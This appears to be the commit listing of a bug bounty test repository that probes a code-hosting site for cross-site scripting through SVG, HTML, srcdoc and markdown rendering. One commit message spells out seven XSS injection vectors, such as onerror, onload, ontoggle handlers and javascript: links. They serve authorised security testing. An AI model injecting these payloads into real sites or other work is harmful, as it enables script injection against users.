xBB bug bounty test repository
master
brwade-xBB
xBB add wf name markup test
xBB README svg foreignObject probe
xBB: commit with injection vectors [xBBmsg1]: <img src=x onerror=alert(1)> [xBBmsg2]: <a href=javascript:alert(1)>xBBmsg2click</a> [xBBmsg3]: <script>window.xBBmsg3=3</script> [xBBmsg4]: <iframe src="https://xBB-external.invalid/xBBmsg4"></iframe> [xBBmsg5]: <svg onload=window.xBBmsg5=5> [xBBmsg6]: [link-md](javascript:alert(1)) xBBmsg6mark [xBBmsg7]: <details open ontoggle=window.xBBmsg7=7>xBBmsg7det</details>
xBB payload.html parent-exec probe
xBB uppercase svg probe
xBB malicious.svg self-proof probe
xBB htm payload probe
xBB xhtml payload probe
xBB srcdoc probe